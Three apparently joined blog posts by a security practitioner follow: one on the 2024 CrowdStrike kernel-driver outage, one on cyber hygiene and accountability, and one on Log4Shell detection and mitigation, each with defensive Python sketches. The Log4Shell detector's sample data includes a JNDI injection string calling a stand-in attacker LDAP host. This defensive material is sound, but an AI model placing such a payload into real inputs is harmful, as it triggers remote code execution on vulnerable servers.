Imagine you are a security manager asked to carry out a security assessment of new software for your organisation. It will be deployed across all Windows workstations and servers and operate as a boot-start driver in kernel mode, granting it extensive access to the system. The driver has been signed by Microsoft’s Windows Hardware Quality Labs (WHQL), so it is considered robust and trustworthy. However, additional components that the driver will use are not included in the certification process. These components are updates that will be regularly downloaded from the internet. As a security manager, would you have any concerns?
I would, but what if the vendor were a leading global cybersecurity company? Do we place too much assumed and transitive trust in cybersecurity vendors?
The recent CrowdStrike Blue Screen of Death (BSOD) incident has raised significant concerns about the security and reliability of kernel-mode software, even when certified by trusted authorities. On July 19, 2024, a faulty update from CrowdStrike, a widely used cybersecurity provider, caused an estimated 8.5 million Windows machines worldwide (Microsoft’s figure) to experience BSOD errors, affecting banks, airlines, TV broadcasters, and numerous other enterprises.
This incident highlights a critical issue that security managers must consider when assessing new software, particularly software that operates in kernel mode. CrowdStrike’s Falcon sensor, while signed by Microsoft’s Windows Hardware Quality Labs (WHQL) as robust and trustworthy, includes components that are downloaded from the internet and are not part of the WHQL certification process.
The CrowdStrike software operates as a boot-start driver in kernel mode, granting it extensive system access. It relies on externally downloaded updates to maintain quick turnaround times for malware definition updates. While the exact nature of these update files is unclear, they could potentially contain executable code for the driver or merely malware definition files. If these updates include executable code, it means unsigned code of unknown origin is running with full kernel-mode privileges, posing a significant security risk.
The recent BSOD incident suggests that the CrowdStrike driver may lack adequate resilience, with insufficient error checking and parameter validation. This became evident when a faulty update caused widespread system crashes, indicating that the software’s error handling mechanisms could not prevent catastrophic failures.
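To make "error checking and parameter validation" concrete, here is a minimal sketch of a loader that validates every field of a downloaded update before using it and falls back to the previous content on failure. The file layout, the `UPD1` magic value and all function names are hypothetical and chosen purely for illustration; they are not CrowdStrike's actual format or code.

```python
import struct

class UpdateFormatError(ValueError):
    """Raised when an update file fails validation."""

# Hypothetical layout: 4-byte magic, 2-byte version, 2-byte record count,
# followed by a table of (offset, length) pairs, followed by the payloads.
HEADER = struct.Struct("<4sHH")
RECORD = struct.Struct("<HH")
MAGIC = b"UPD1"

def parse_update(blob: bytes) -> list[bytes]:
    """Check every field before use; reject the file rather than crash."""
    if len(blob) < HEADER.size:
        raise UpdateFormatError("file shorter than header")
    magic, version, count = HEADER.unpack_from(blob, 0)
    if magic != MAGIC:
        raise UpdateFormatError("bad magic value")
    if version != 1:
        raise UpdateFormatError(f"unsupported version {version}")
    table_end = HEADER.size + count * RECORD.size
    if table_end > len(blob):
        raise UpdateFormatError("record table runs past end of file")
    payloads = []
    for i in range(count):
        offset, length = RECORD.unpack_from(blob, HEADER.size + i * RECORD.size)
        # Every offset must point inside the file and after the table.
        if offset < table_end or offset + length > len(blob):
            raise UpdateFormatError(f"record {i} points outside the file")
        payloads.append(blob[offset:offset + length])
    return payloads

def load_update_or_keep_previous(blob: bytes, previous: list[bytes]) -> list[bytes]:
    """Fail safe: a malformed update leaves the previous content in place."""
    try:
        return parse_update(blob)
    except UpdateFormatError:
        return previous
```

The design point is that a malformed file results in a rejected update, not in an out-of-range access. In a kernel-mode driver the same checks would be written in C, where skipping them can crash the whole machine.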
For security managers, this incident serves as a stark reminder of the potential risks associated with kernel-mode software, even when it comes from reputable sources. It underscores the need for thorough assessments of such software, paying particular attention to:
1. Update mechanisms and their security implications
2. The scope of WHQL certification and what it does and does not cover
3. Error handling and system stability safeguards
4. The potential impact of software failures on critical systems
While CrowdStrike has since addressed the issue and provided fixes, the incident has caused significant disruptions across various sectors. It has also prompted discussions about balancing rapid threat response capabilities and system stability in cybersecurity solutions.
In conclusion, this event emphasises the importance of rigorous security assessments for kernel-mode software, regardless of its certifications or reputation. Security managers must carefully weigh the benefits of such software against the potential risks they introduce to system stability and security.
It is just over thirty years since Tim Berners-Lee’s research at CERN in Switzerland resulted in the World Wide Web, which many of us now simply call the Internet. Who would have thought, Tim included, that the Internet would become what it is today? This network of networks impacts every aspect of life on Earth and beyond. People have never been as connected as they are now. The Internet has given rise to new business models and helped traditional businesses find new and innovative ways to market their products.
Unfortunately, as with everything else, there are malicious actors on the Internet who try to exploit vulnerabilities in its technologies for their own vested interests. As first-generation users of the Internet, everything was new to us. Whether it was online entertainment or online shopping, we were the first to use it. We grew up with the Internet. We have all been victims of Internet crime or cybercrime at some point in our lives. This created a whole new industry, now called “cybersecurity”, which is seen as the protector against cybercrime. However, it has always been a big challenge to settle who is responsible for security: the business or the cybersecurity team.
Why do we need to fix responsibility?
Globalisation and, more recently, the pandemic have increased the number of people working remotely, which has become an ever-increasing headache for companies. As a result, the number of security incidents has increased manifold, as has the cost per incident. The cost of cyber incidents is rising year on year.
According to IBM’s Cost of a Data Breach Report 2021, the average data breach costs businesses upward of $4.2 million.
Governments mandate cybersecurity compliance requirements, and non-compliance attracts massive penalties in some jurisdictions. For example, non-compliance with Europe’s General Data Protection Regulation (GDPR) may see companies fined up to €20 million or 4 per cent of their annual global turnover, whichever is higher.
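The ceiling on such a fine is simple arithmetic. The sketch below assumes the upper tier of GDPR fines (Article 83(5)), where the cap is the higher of the flat amount and the turnover-based amount. The function name is illustrative, and the result is the maximum a regulator could impose, not a prediction of an actual penalty.

```python
def gdpr_max_fine_eur(annual_global_turnover_eur: int) -> float:
    """Upper bound of a top-tier GDPR fine: the higher of the two caps."""
    flat_cap_eur = 20_000_000
    turnover_cap_eur = annual_global_turnover_eur * 4 / 100  # 4 per cent
    return max(flat_cap_eur, turnover_cap_eur)
```

For a company with a €100 million turnover the flat €20 million cap applies. For a company with a €1 billion turnover the cap rises to €40 million.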
Companies that traditionally viewed security as a cost centre are now viewing it differently due to the losses they incur because of the breaches and penalties. We have seen a change in the attitude of these organisations due to the above reasons. Today, companies see security as everyone’s responsibility instead of an IT problem.
Cyber hygiene: Challenges and repercussions of poor practice
Cyber hygiene, like personal hygiene, is the set of practices that organisations deploy to ensure the security of their data and networks. Maintaining basic cyber hygiene can be the difference between suffering a damaging breach and recovering quickly from one without a massive impact on the business.
Cyber hygiene increases the opportunity cost of an attack for cybercriminals by reducing vulnerabilities in the environment. By practising cyber hygiene, organisations improve their security posture. They can become more efficient at defending themselves against persistent, devastating cyberattacks. Good cyber hygiene is already incentivised: it reduces the likelihood of being hacked and of incurring fines, legal costs, and reduced customer confidence.
The biggest challenge in implementing good cyber hygiene is knowing what we need to protect. Having a good asset inventory is the first step. In a hybrid working environment, having clear visibility of your assets is important. You can’t protect something you don’t know about. Therefore, it is imperative to know where your information assets are located on your network and who is using them. It is also very important to know where the data is located and who can access it.
Another significant challenge is to maintain discipline and continuity over a long period. Scanning your network occasionally will not help stop unrelenting cyberattacks. Therefore, automated monitoring must be implemented to continuously detect and remediate threats, which requires investment in technical resources that many businesses don’t have.
Due to the above challenges, we often see poor cyber hygiene resulting in security vulnerabilities and potential attack vectors. The following are some of the vulnerabilities that result from poor hygiene:
Unclassified Data: Inadequate data classification results in misplaced data that ends up stored in places that may not be adequately protected.
Data Loss: Poor and inadequate data classification may result in data loss due to a lack of adequate protection controls. Data may not be recoverable after a data breach, hardware failure, or improper data handling if it is not regularly backed up and the backups tested for corruption.
Software vulnerabilities: All software contains vulnerabilities. Developers release patches regularly to fix them. A missing or poor patch management process will leave software vulnerable, which hackers can potentially exploit to gain access to the network and data.
Poor endpoint protection: The AV-TEST Institute registers over 450,000 new malicious applications (malware) and potentially unwanted applications every day. Where endpoint protection practices, including malware protection tools, are inadequate, hackers can use a wide range of tools and techniques to get inside your network and steal data.
Inadequate vendor risk management: With ever-increasing supply chain attacks, comprehensive vendor risk management must be implemented, considering the potential security risks posed by third-party vendors and service providers, especially those that access and process sensitive data. Failure to implement such a process will further expose the organisation to service disruptions and security breaches.
Poor compliance: Poor cyber hygiene often results in non-compliance with various legal and regulatory requirements.
Building Accountability within your cybersecurity organisation
With ever-increasing breaches and their impacts, we should start considering, as an industry and as a society, how to motivate organisations to make cybersecurity a way of life. Cyber hygiene must be demanded from the organisations that hold, process, and use your data.
Now that we understand the challenges of having good cyber hygiene, we must also understand what we have been doing to solve these issues. So far, we have tried many ways. Some companies have developed controls internally, and others have followed externally mandated rules and regulations. However, we have failed to address the responsibility and accountability issue. We have failed to balance the business requirements and the rigour required for cybersecurity. For example, governments have made laws and regulations with punitive repercussions without considering how a small organisation will be able to implement controls to comply with them.
There are no simple solutions for this complex problem. Having laws and regulations definitely raises the bar for organisations to maintain a good cybersecurity posture, but this will not keep the hackers out forever. Organisations need to be more proactive in introducing more accountability within their security organisation. Cybersecurity professionals need to take responsibility and accountability for preventing and thwarting cyberattacks. At the same time, business leaders need to understand the problem and bring in the right people for the job to start with. They then need to develop and implement the right cybersecurity framework, one that aligns with the business risks. Making cybersecurity one of the strategic pillars of the business strategy will engrain it in the organisation’s DNA.
There are many ways we can start this journey. To start with, organisations will need glue: a cybersecurity framework, such as the National Institute of Standards and Technology (NIST) Cybersecurity Framework (CSF).
The NIST CSF is a great way to start baselining your cybersecurity functions. It provides a structured roadmap and guidelines to achieve good cyber hygiene. In addition, the CSF provides guidance on things like patching, identity and access management, and least-privilege principles, which can help protect your organisation. Once you get the basics right, along with automation, your organisation will have more time to focus on critical functions. In addition, setting up basic hygiene processes will improve user experience and make network behaviour more predictable, resulting in fewer service tickets.
Research has shown that the best security outcomes are directly proportional to employee engagement. Organisations may identify “Security Champions” within the business who can evangelise security practices in their respective teams. The security champions can act as a force multiplier while setting up accountabilities. They can act as your change agents by identifying issues quickly and driving the implementation of the solutions.
Conclusion
There is no good time to start. However, the sooner you start addressing and optimising your approach to cyber-hygiene and cybersecurity, the faster you will achieve assurance against cyberattacks. This will bring peace of mind knowing the controls are working and are doing what they are supposed to. You will not be scrambling during a breach to find solutions to the problem but ready to respond to any eventuality.
If your organisation has managed to avoid a serious breach despite poor cyber hygiene, it is just a matter of time before your luck runs out.
On 10th Dec 2021, a zero-day vulnerability was announced in Apache’s Log4j library. Known as Log4Shell, it is one of the most severe vulnerabilities since Heartbleed. Exploiting this vulnerability is trivial, and therefore we have seen new exploits daily since the announcement. Some of us will be spending this holiday period mitigating this vulnerability.
Since the announcement last weekend, a lot has been written about Log4Shell. Researchers are finding new exploits in the wild and are adjusting the response. I am not trivialising the extent and impact of this vulnerability with the title of this post. Still, I would like to suggest taking a step back, bringing some calm and strategising the mitigation plan. We are in the early stages of the response, and if the past week is any indication, we are here for the long haul.
In this post, I will focus on two aspects of this zero-day. The technical aspects are, for sure, paramount and require immediate attention. However, long-term governance is equally important and will ensure that we are not blindsided by that one insignificant application which was ignored or seen as low-risk.
So, what is the Log4Shell vulnerability?
Apache’s Log4j, an open-source Java-based logging framework, is commonly used by many apps and services. By exploiting the vulnerability, an attacker can use a well-crafted request to break into the target system, steal credentials and logins, infect networks, and steal data. Because Log4j is used worldwide across software applications and online services, the impact is far-reaching, and the vulnerability requires very little expertise to exploit. These far-reaching consequences make Log4Shell potentially the most severe computer vulnerability in years.
“Log4Shell” (CVE-2021-44228) is the name given to the vulnerability in the Log4j library. Apache Log4j2 2.14.1 and below are susceptible to a remote code execution vulnerability that a remote attacker can leverage to take full control of a vulnerable machine. The Log4Shell vulnerability is exploited by injecting a JNDI (Java Naming and Directory Interface) LDAP (Lightweight Directory Access Protocol) lookup string into the logs, triggering Log4j to contact the specified LDAP server for more information.
In a malicious scenario, the attacker can use the LDAP server to serve malicious code back to the victim’s machine, where it is automatically executed in memory. In other words, data injected by an untrusted party merely to be written to a log file can take over the server doing the logging. What is, for you, just an instruction to log activity can, if exploited, quickly turn into a data leak or the execution of malicious code.
Simply put, an event log intended and required for completeness could turn into a malware implantation event. This is nasty and requires taking all necessary steps to ensure that you don’t fall victim to this malicious scenario.
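To illustrate what an injected lookup string looks like in practice, the following minimal sketch searches log lines for the plain `${jndi:...}` form. The function name, the sample log lines and the choice of protocols (LDAP as described above, plus RMI and DNS, which have also been used with JNDI lookups) are assumptions for illustration. Obfuscated variants such as nested lookups will evade this simple pattern, so treat it as a triage aid, not as proof of absence.

```python
import re

# Matches the un-obfuscated lookup prefix only, e.g. ${jndi:ldap://host/a}
JNDI_PATTERN = re.compile(r"\$\{jndi:(?:ldap|ldaps|rmi|dns)://", re.IGNORECASE)

def find_jndi_lookups(lines):
    """Return (line_number, line) pairs that contain a JNDI lookup string."""
    hits = []
    for number, line in enumerate(lines, start=1):
        if JNDI_PATTERN.search(line):
            hits.append((number, line.rstrip("\n")))
    return hits

# Hypothetical access-log lines: the second carries the payload in a header.
sample_log = [
    '203.0.113.9 "GET /index.html" 200 "Mozilla/5.0"',
    '203.0.113.9 "GET /" 200 "${jndi:ldap://attacker.example/a}"',
]
suspicious = find_jndi_lookups(sample_log)
```

Note that the payload arrives in an ordinary field, such as a user-agent header, that the application logs as a matter of routine.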
Am I affected?
Overwhelmingly “yes”, unless proven otherwise. Almost every software or service will have some sort of logging capability. Software’s behaviours are logged for development, operational and security purposes. Apache’s Log4j is a very common component used for this purpose.
For individuals, Log4Shell will almost certainly impact you. Most devices and services you use online daily will be affected. Keep an eye on the updates and instructions from the vendors of these devices and services over the next few days and weeks. As soon as a vendor releases a patch, update your devices and services to mitigate the risk associated with this vulnerability.
For businesses, it is going to be very tricky, and the true impact may not be clear immediately. In addition, even though Apache has already recommended upgrading to version 2.17.0, there may be various implementations of the Log4j library in use. So again, keep an eye on vendors releasing patches and install them as soon as possible.
How do I find out whether my server is impacted?
The answer to this question is not straightforward. It is challenging to find out whether a given server in your network is affected by the vulnerability. You might assume that the only servers at risk are public-facing ones running code written in Java, where incoming requests are handled by Java software and the Java runtime libraries. By that reasoning, you could consider yourself safe if the frontend is built on products such as Apache’s httpd web server, Microsoft IIS, or Nginx, as all these servers are coded in C or C++.
As more information emerges on the breadth and depth of this vulnerability, it looks as though Log4Shell is not limited to servers coded in Java. Since it is not a vulnerability in TCP-based socket handling code, it can stay hidden anywhere in the network where user-supplied data is processed and logs are kept. Even if the frontend is a non-Java platform, you may get caught out by all those third-party Java libraries that make part of the overall application code vulnerable.
Ideally, every application on your network that is written in Java must be evaluated for the Log4j library. You can take the following two approaches:
1. Search for Vulnerable Code: Initiate a search for vulnerable code by scanning all servers and applications for vulnerable versions of Log4j libraries. Since Log4j code could be buried deep inside a Java class, a basic search for Log4j will not be good enough. To be certain, you may have to use additional tools and techniques. There are two (2) open-source scanning tools available that can list out code versions or vulnerable code:
• Grype (https://github.com/anchore/grype): Searches libraries installed on a system and displays vulnerabilities present
• Syft (https://github.com/anchore/syft): Searches for installed code and libraries and displays their versions
2. Active Scanning of Deployed Code: Nessus with updated plugins can be used for active vulnerability scanning to identify whether the vulnerability exists. Some security vendors have also set up public websites to conduct minimal testing against your environment. Other open-source and commercial tools can also be used for active scanning.
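As a sketch of the first approach, the script below walks a directory tree and looks inside JAR, WAR and EAR archives, including archives nested within them, for the `JndiLookup` class that ships in log4j-core. The function names are illustrative. Finding the class only shows that log4j-core is bundled, because patched releases still contain it, so every hit needs a follow-up version check. This is not a replacement for dedicated scanners such as Grype or Syft.

```python
import io
import zipfile
from pathlib import Path

# Class file shipped in log4j-core; a prefix is allowed for repackaged jars.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear")

def archive_contains_jndi_lookup(data: bytes, depth: int = 0, max_depth: int = 5) -> bool:
    """Return True if the archive, or any archive nested in it, has the class."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as archive:
            for name in archive.namelist():
                if name.endswith(JNDI_CLASS):
                    return True
                if depth < max_depth and name.lower().endswith(ARCHIVE_SUFFIXES):
                    nested = archive.read(name)
                    if archive_contains_jndi_lookup(nested, depth + 1, max_depth):
                        return True
    except zipfile.BadZipFile:
        return False  # Not a readable archive; skip it.
    return False

def scan_tree(root: str) -> list[Path]:
    """List archives under root that bundle the JndiLookup class."""
    hits = []
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in ARCHIVE_SUFFIXES:
            if archive_contains_jndi_lookup(path.read_bytes()):
                hits.append(path)
    return sorted(hits)
```

Calling `scan_tree("/opt/apps")` (an example path) returns the archives worth a closer look. Nested archives matter because application servers and "fat" JARs routinely bundle their dependencies several levels deep.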
How can I mitigate Log4Shell and prevent an attack?
In principle, the prevention and mitigation techniques are no different from the response to any other zero-day. The vulnerability is trivial to trigger but complex to exploit fully, so the presence of the vulnerable library does not necessarily mean that it can be successfully exploited. Several pre- and postconditions must be met for a successful attack. Some of these preconditions, such as the JVM being used, the server/app configuration, and the version of the library, will decide whether exploitation succeeds. On 17th Dec, the Apache Foundation announced that the earlier fix was incomplete and released a further fix in version 2.17.0.
At the time of writing this post, the following is the current list of vulnerabilities and recommended fixes:
• CVE-2021-44228 (CVSS score: 10.0): A remote code execution vulnerability affecting Log4j versions from 2.0-beta9 to 2.14.1 (Fixed in version 2.15.0)
• CVE-2021-45046 (CVSS score: 9.0): An information leak and remote code execution vulnerability affecting Log4j versions from 2.0-beta9 to 2.15.0, excluding 2.12.2 (Fixed in version 2.16.0)
• CVE-2021-45105 (CVSS score: 7.5): A denial-of-service vulnerability affecting Log4j versions from 2.0-beta9 to 2.16.0 (Fixed in version 2.17.0)
• CVE-2021-4104 (CVSS score: 8.1): An untrusted deserialization flaw affecting Log4j version 1.2 (No fix available; Upgrade to version 2.17.0)
The Swiss Government’s CERT provides quite a good visualisation of the attack sequence, with recommended mitigations for each of the vulnerable points in the sequence.
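The version ranges in this list can be turned into a small lookup, which is handy once an inventory of Log4j versions exists. This is a minimal sketch that mirrors the list in this post as written; later advisories and backport releases are not reflected. The function names are illustrative, and pre-release tags are simplified, so any 2.0 beta is treated as 2.0.0.

```python
import re

# (CVE id, first affected version, fixed-in version, excluded versions),
# transcribed from the list in this post.
ADVISORIES = [
    ("CVE-2021-44228", (2, 0, 0), (2, 15, 0), set()),
    ("CVE-2021-45046", (2, 0, 0), (2, 16, 0), {(2, 12, 2)}),
    ("CVE-2021-45105", (2, 0, 0), (2, 17, 0), set()),
]

def parse_version(text: str) -> tuple:
    """Turn '2.14.1' or '2.0-beta9' into a comparable (major, minor, patch)."""
    match = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not match:
        raise ValueError(f"unrecognised version: {text!r}")
    major, minor, patch = match.groups()
    return (int(major), int(minor), int(patch or 0))

def cves_affecting(version_text: str) -> list:
    """Return the CVEs from the list above that apply to a Log4j version."""
    version = parse_version(version_text)
    if version[:2] == (1, 2):
        return ["CVE-2021-4104"]  # Log4j 1.2 has no fix; upgrade is advised.
    return [
        cve
        for cve, first, fixed, excluded in ADVISORIES
        if first <= version < fixed and version not in excluded
    ]
```

For example, `cves_affecting("2.15.0")` returns the two CVEs fixed in 2.16.0 and 2.17.0, which shows why the first patch alone was not enough.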
Where from here?
Keep Calm and Carry On……. We are here for the long haul, and there is no easy fix. You may find that you have fixed one app or server today, only for something else to pop up the next morning. If you have not done it yet, the best course is to set up a generic incident response playbook for zero-day vulnerabilities. This will help you respond to any such event in the future in a systematic way. The key to success here is keeping an eye on the tools and techniques and their effectiveness in responding to any new zero-day.
As far as Log4Shell is concerned, we are still in the early days and can’t be sure that, once we have patched, nothing else will surface. This is evident from the fact that in the week or so since the announcement of the original CVE, three more have been attributed to Log4j libraries. As a result, the Apache Foundation has recommended the following mitigations to prevent the exploitation of vulnerable code.
First, upgrade vulnerable versions of Log4j to version 2.17.0 or apply vendor-supplied patches. If, for some reason, it is not possible to upgrade, some workarounds can be used. However, there is always a risk that additional vulnerabilities (such as CVE-2021-45046) will make the workarounds ineffective. Therefore, it is best to upgrade to version 2.17.0. In addition, some common mitigations must be considered and applied:
• Isolate systems by restricting them to their security zones, i.e. DMZs or VLANs.
• Block all outbound network connections from servers unless required for their functional role. Even then, restrict outbound network connections to trusted hosts and network ports only.
• Depending on your endpoint protection strategy, update any signature or plugin to prevent Log4j exploitation.
• Continuously monitor networks and servers for any indicators of compromise (IOC).
• Test and retest after patching as part of the mitigation plan, since it has been seen that the vulnerability may persist even after a patch is implemented.
In the times we are living in, such events have become the norm. Vulnerable code, unfortunately, is inevitable, and there will always be someone keen to find such code and exploit it for their own vested interest. It is only a matter of time before we are hacked, and that one incident may disrupt your business. Therefore, it is paramount to develop and implement business continuity plans that can minimise the impact of such an event. These plans must be updated and tested regularly to keep pace with changing threat scenarios. Security incident response plans must be practised regularly as a “way of life” and adjusted when a new vulnerability or threat scenario is identified.
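The outbound-connection restriction among the mitigations above comes down to an allowlist check: a destination is permitted only if it matches a trusted network and port. The sketch below shows that logic with made-up addresses and ports. Real enforcement belongs in a firewall or security group, but the same check is useful for auditing connection logs for unexpected egress, such as a server reaching out to an unknown LDAP host.

```python
import ipaddress

# Hypothetical allowlist: (trusted destination network, permitted port).
ALLOWED_EGRESS = [
    (ipaddress.ip_network("10.20.0.0/24"), 443),    # internal API tier
    (ipaddress.ip_network("10.20.1.10/32"), 5432),  # database host
]

def egress_allowed(dest_ip: str, dest_port: int) -> bool:
    """Default deny: allow only destinations listed in ALLOWED_EGRESS."""
    address = ipaddress.ip_address(dest_ip)
    return any(
        address in network and dest_port == port
        for network, port in ALLOWED_EGRESS
    )
```

With this policy, a callback from a compromised server to an attacker-controlled host on an LDAP port is denied by default, which breaks the Log4Shell attack sequence even on an unpatched system.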
In situations like the Log4j zero-day, one can get overwhelmed by the sheer volume of work needed to protect ourselves. As Huntress Labs Senior Security Researcher John Hammond said, “All threat actors need to trigger an attack is one line of text,” but the responders need to spend hours, days and weeks protecting themselves. In such overwhelming scenarios, I recommend taking a deep breath and keeping calm while doing what we need to do. Reach out to people, and don’t be shy about asking for help if you are stressed. I wish all the best to all of you who will be required to stay back during the holiday to keep your businesses protected.